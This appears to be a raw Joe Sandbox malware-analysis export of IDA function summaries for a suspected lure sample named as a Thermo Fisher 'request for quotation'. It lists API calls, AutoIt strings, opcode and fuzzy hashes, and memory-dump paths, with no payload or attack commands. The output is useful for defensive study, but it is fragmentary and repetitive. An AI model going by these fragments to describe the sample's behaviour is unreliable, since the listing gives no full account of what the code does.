                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                              • String ID: (l
                                                              • API String ID: 3761405300-951426420
                                                              • Opcode ID: cf4d220777b5602cb11e574e325464bfa94c0d9b58d297054c6f1ce31069c94d
                                                              • Instruction ID: 64018807fb4b80f7b6cc5570db916a03661a888040fb872b76769f4e856aedc6
                                                              • Opcode Fuzzy Hash: cf4d220777b5602cb11e574e325464bfa94c0d9b58d297054c6f1ce31069c94d
                                                              • Instruction Fuzzy Hash: 0C21C2F5591204DAF740DF55F999A603BB7BB4C314F10682AE5058B3B1E3F1A981CF89
                                                              APIs
                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0065A84E
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0065A88B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: htonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 3832099526-2422070025
                                                              • Opcode ID: 7355dabda6f97fa8f169d9c4e3a7548fd7e6ac27a554a3470711d1048c7c4f88
                                                              • Instruction ID: 09e29ec1ebd55dc8d7ede9d70ee2274859617a8c5344f7c105d1e6ffcce91c3a
                                                              • Opcode Fuzzy Hash: 7355dabda6f97fa8f169d9c4e3a7548fd7e6ac27a554a3470711d1048c7c4f88
                                                              • Instruction Fuzzy Hash: 5001D675200304ABCB109FA8D846FE9B766EF44721F10866AF915973D1D771E8098756
                                                              APIs
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0063B7EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 6c490465c9fee8216d6bfddcc711b8988f264c3a9f44f589ce7c657d4215d656
                                                              • Instruction ID: 831d04f617421ddbc072e0fb7447cf0c07aacf24107dde0b2718d3dc57f4f726
                                                              • Opcode Fuzzy Hash: 6c490465c9fee8216d6bfddcc711b8988f264c3a9f44f589ce7c657d4215d656
                                                              • Instruction Fuzzy Hash: E101B1B1641118ABCB48EBA8CC529FE73BBEF45360B04071DF562672D2EB70590887A4
                                                              APIs
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0063B6EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: de7af55c70316a335f15806dd2ffeb42baafe84a25b1ac8b7bf973a873478d13
                                                              • Instruction ID: 6489c2f25b6b9cdc77d987402554f061c1e1409895d56291020a254d9df6d3b0
                                                              • Opcode Fuzzy Hash: de7af55c70316a335f15806dd2ffeb42baafe84a25b1ac8b7bf973a873478d13
                                                              • Instruction Fuzzy Hash: 7601A2B1681008ABCB48EBA4C963EFF73AA9F06350F10111DB502B32D2EF505E1887F9
                                                              APIs
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 0063B76C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 45fc54e9e2f8c74916676ead4a5887794cca675dc1bb056648c1a6e24fdfd9b2
                                                              • Instruction ID: 0ed79a76eba1c35e807394ec665c0b6b56acf594d1b340ba67b9e9d7b05ebc9f
                                                              • Opcode Fuzzy Hash: 45fc54e9e2f8c74916676ead4a5887794cca675dc1bb056648c1a6e24fdfd9b2
                                                              • Instruction Fuzzy Hash: 32018BB1680108ABCB44EBA8D952AFF73AADB05350F10011DB902B32D2EB605E0987F9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID: "l
                                                              • API String ID: 3494438863-126353359
                                                              • Opcode ID: b73097aa8f06fbc209ada6a55116b19c611dfe834de3b4bc6e93a378dc73cdb5
                                                              • Instruction ID: 970a0c40f801610b1b97dad524fdb0dfce74552f89fdbe08cdfae4584e5bc47a
                                                              • Opcode Fuzzy Hash: b73097aa8f06fbc209ada6a55116b19c611dfe834de3b4bc6e93a378dc73cdb5
                                                              • Instruction Fuzzy Hash: 94F0C871209B239AF7149F59FC61EB6A7D7EB04B60F10491EF601CA294EF34C9814F98
                                                              APIs
                                                              • LoadImageW.USER32(00600000,00000063,00000001,00000010,00000010,00000000), ref: 00604048
                                                              • EnumResourceNamesW.KERNEL32(00000000,0000000E,006467E9,00000063,00000000,75A90280,?,?,00603EE1,?,?,000000FF), ref: 006741B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: EnumImageLoadNamesResource
                                                              • String ID: >`
                                                              • API String ID: 1578290342-3896962745
                                                              • Opcode ID: 08c953988d513a201e4e5fe29fc084df8b6879d6e5a87e33ec02bbad15a59ade
                                                              • Instruction ID: 6c25527aaeec587f59fdd0a6086f5abd190f08de8aa2927b68c6c159c1dd8f8e
                                                              • Opcode Fuzzy Hash: 08c953988d513a201e4e5fe29fc084df8b6879d6e5a87e33ec02bbad15a59ade
                                                              • Instruction Fuzzy Hash: 30F06D71740350BBE3205B1AEC4AFE23BABA757BB5F101106F325AA1D1D6E090908BA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: edb111bf6686729ef2cba75ab5302d0974446cb4f1300a0b70126ef70cb38f44
                                                              • Instruction ID: 6fb40689dfcece01cd422787099ded2fe04a3809eaac9ce358fcb37167866d57
                                                              • Opcode Fuzzy Hash: edb111bf6686729ef2cba75ab5302d0974446cb4f1300a0b70126ef70cb38f44
                                                              • Instruction Fuzzy Hash: BEE0927760427827D710AAA5AC09EDBFBADAB51760F01015AB905E3181E670A64187E4
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0063A63F
                                                                • Part of subcall function 006213F1: _doexit.LIBCMT ref: 006213FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: db21813955b4836d80574ec405847e2ad8114388a54f94e718cbe4397a37b588
                                                              • Instruction ID: 6eaabd95ac0f5103e07482ca651d49728e80a9af5aa28cf31a2f1fc72f04587f
                                                              • Opcode Fuzzy Hash: db21813955b4836d80574ec405847e2ad8114388a54f94e718cbe4397a37b588
                                                              • Instruction Fuzzy Hash: CAD02B313C432833C31436983C17FC6364F8B15B51F040029BB0C955D259E285C013ED
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0067ACC0
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0067AEBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: DirectoryFreeLibrarySystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 510247158-3257408948
                                                              • Opcode ID: 092dcf50f858e8264563c9a9af38115811b4cc13706e55b797bc7dda4ea6bc39
                                                              • Instruction ID: 30b0cfe4ec507ea341c8dd2012aa2a8203545bbfc1652870db56aafdf244b56f
                                                              • Opcode Fuzzy Hash: 092dcf50f858e8264563c9a9af38115811b4cc13706e55b797bc7dda4ea6bc39
                                                              • Instruction Fuzzy Hash: DFE06D70C00209FFCB16DBE4D9849ECB7BAAB88301F14D286E106B2260CB304A85DF32
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006686E2
                                                              • PostMessageW.USER32(00000000), ref: 006686E9
                                                                • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: b6fb85a98f8522bb861eaa096b2606f25465714e6fe44ec40309fb094262819d
                                                              • Instruction ID: 7cd8d34bab31d27cc32e184c15f336b1039ce8d63cffea22f9d78440fd68ada7
                                                              • Opcode Fuzzy Hash: b6fb85a98f8522bb861eaa096b2606f25465714e6fe44ec40309fb094262819d
                                                              • Instruction Fuzzy Hash: D7D012723853287BF3746770AC0BFC67B1A9B04B21F111A19B745EA1D0C9E4E980C769
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006686A2
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006686B5
                                                                • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 17c4818fbed9f3eab0a48999b63713dbaf65b76a22ec64facfb96dea2bb77042
                                                              • Instruction ID: b1a62d3b77822d52fbf46693795b0c18f4589042fcfc29d99a3b4a0d66fc9e78
                                                              • Opcode Fuzzy Hash: 17c4818fbed9f3eab0a48999b63713dbaf65b76a22ec64facfb96dea2bb77042
                                                              • Instruction Fuzzy Hash: 1FD01272394328B7E3746770AC0BFD67B1A9B04B21F111A19B749AA1D0C9E4E980C765